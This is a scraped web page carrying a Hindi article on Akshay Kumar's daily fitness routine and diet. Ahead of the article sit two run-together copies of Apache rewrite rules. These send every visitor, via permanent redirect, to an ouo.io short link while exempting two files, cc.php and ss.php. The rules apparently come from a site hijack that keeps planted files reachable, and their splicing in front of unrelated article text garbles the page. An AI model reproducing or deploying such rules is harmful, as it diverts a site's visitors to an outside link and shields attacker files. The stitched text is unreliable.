
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 566
Previousअक्षय कुमार 50 साल के हैं, लेकिन उनकी फिटनेस और फिजिक देखकर ये अंदाजा लगा पाना काफी मुश्किल है। सिक्स या एट पैक एब्स बनाने में उनकी कोई दिलचस्पी नहीं है, लेकिन जिस तरह वो खुद को फिट रखते हैं, वो एब्स से कहीं ज्यादा और बेहतर नजर आता है। आप भी जानिए क्या है अक्षय की इस फिटनेस का राज-
50 साल की उम्र में भी जिस एनर्जी और स्टेमिना के साथ अक्षय कुमार काम करते हैं, वो अपने आप में एक मिसाल हैं। उन्हें देखकर कई लोग सोचते हैं कि जिम जाकर वो ऐसी बॉडी बना सकते हैं। जंक फूड छोड़कर उनके जैसी एनर्जी ला सकते हैं, मगर ये जानकर आपको हैरानी हो सकती है कि उनके जैसा बनने के लिए ऐसा कुछ करने की जरूरत नहीं है। बिना जिम जाए भी अक्षय की तरह फिट और फाइन रहा जा सकता है। उनके फिटनेस सीक्रेट जानने के बाद ऐसा करना मुश्किल जरूर लगेगा, लेकिन नामुमकिन नहीं।
सुबह 4.30 बजे उठते हैं अक्षय। एक घंटे स्विमिंग करते हैं। एक घंटे मार्शल आर्ट्स की प्रैक्टिस करते हैं। इसमें योगा और स्ट्रेचिंग एक्सरसाइज हो जाती हैं। इसके बाद एक घंटे मेडिटेशन करते हैं।
स्टेमिना बढ़ाने के लिए वह बास्केटबॉल और किकबॉक्सिंग जैसी एक्टिविटिज भी डेली रूटीन में शामिल रखते हैं। रात को नौ बजे सो जाते हैं अक्षय कुमार।
वह सूरज डूबने के बाद कुछ भी नहीं खाते हैं। उनके ब्रेकफास्ट में शामिल होता है एक परांठा और एक दूध का गिलास। दोपहर में वह फ्रेश फ्रूट्स खाते हैं। लंच में रोटी, दाल, सब्जी, चिकन और एक कटोरी दही शामिल होती है। स्नैक्स में विदआउट शुगर जूस औऱ डिनर में वह सूप, सलाद और सब्जी खाते हैं।
जितना हो सके जंक फूड और बाहर के खाने से बचते हैं। बेशक उनका ये रूटीन फॉलो करना शुरुआत में तकलीफदेय हो सकता है, लेकिन अक्षय तो पिछले काफी सालों से ऐसा ही कर रहे हैं और उनके फैंस के लिए उनका ये सीक्रेट मंत्र सामने आना काफी खास हो सकता है।